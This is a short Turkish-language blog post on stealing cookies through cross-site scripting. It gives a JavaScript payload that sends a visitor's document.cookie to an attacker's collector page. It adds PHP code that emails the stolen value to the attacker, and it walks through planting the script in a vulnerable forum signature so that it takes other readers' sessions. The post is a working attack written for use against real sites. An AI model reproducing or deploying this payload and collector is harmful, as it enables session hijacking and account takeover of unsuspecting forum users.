Главная » 2009 » Июнь » 18 » Cookie Çalma
17:03
Cookie Çalma
script>window.navigate("http://www.örnek.com/cookieyolla.php?data="+document.cookie)</script>


Bu html kodu, kodun mevcut olduğu sayfayı açanların cookie değerlerini cookieyolla.php uzerinden bize yollamaktadır. Cookie yolla.php çok basit bir php kodudur, "data" değerini "cookieyolla.php" üzerinden maille atar "+document.cookie ise cookie yi çalan javascript kodudur. Işin mantığı bu.

Cookieyolla.php kodu:


$cookie = $_GET['data'];

$kime = "nick@mailserverı.com";

$konu = "cookie";

mail ($kime,$konu,$cookie);

?>



Not: cookieyolla.php'yi kendiniz değiştirebilirsiniz, yaratıcılığınıza bağlı.

nick@mailserverı.com yerine cookie değerini yollamasını istediğiniz maili(yani kendi mailinizi yazın)
Cookie çalma olayı iki şekilde gerçekleştirilebilir.

Birincisi XSS yani "cross site scripting" dir. Bu yontemle bir web sitesi başka bir sitenin cookie sini okur. Bu yöntemle kurban A sitesine girer ve A sitesindeki script, kurbanın daha once girmiş olduğu B sitesinin cookie sini okur ve depolar. Bu işi yapmanın çeşitli yolları vardır, bu bir açıktır ve açığın bulunmadığı sistemlere etki etmez.

İkinci yöntem ise forum tarzı bir siteye script inject etmekle olur. forumda kullandığın imza yerine bir script koyuyorsun ve başkaları senin mesajını okurken bu script işletiliyor. Sonuç olarak bu script başkalarının forumdaki cookiesini okuyup sana gonderiyor. Bu yontemin uyg****abilmesi için oncelikle forum sitesinde script işletebileceğin bir açık olması gerekir. Birçok forum sitesinde gerekli korumalar yapılmıştır ve imza yerine koyacağın script site tarafından işletilmeyecektir. Eğer sitede bu açık varsa yukarda yazdığın şeyler işe yarar. www.örnek.com yerine kendi web sitenin adresini yazacaksın. Kendi sitene koyduğun yukarda yazan php sayfası scriptin işletildiği siteden cookie değerini alıp sana mail atacak. ,

Daha açık anlatmak gerekirse, mesela benim sitem www.örnek.com ben şöyle yapacam:

www.örnek.com/cokieyolla.php diye bir php sayfası oluşturuyorum sitemde . Bu php sayfasının kodlarını şöyle yapıyorum:


$cookie = $_GET['data'];

$kime = "nick@mailserver.com";

$konu = "cookie";

mail ($kime,$konu,$cookie);

?>


sitemde php sayfamı hazırladım. Şimdi dandik bir forum sitesine giriyorum. imza kısmında script işletme açığı olduğunu fark ediyorum ve imzama şunu yazıyorum:

********>window.navigate("http://www.örnek.com/cookieyolla.php?data="+document.cookie)</script>


Просмотров: 1191 | Добавил: Angel_Boy | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]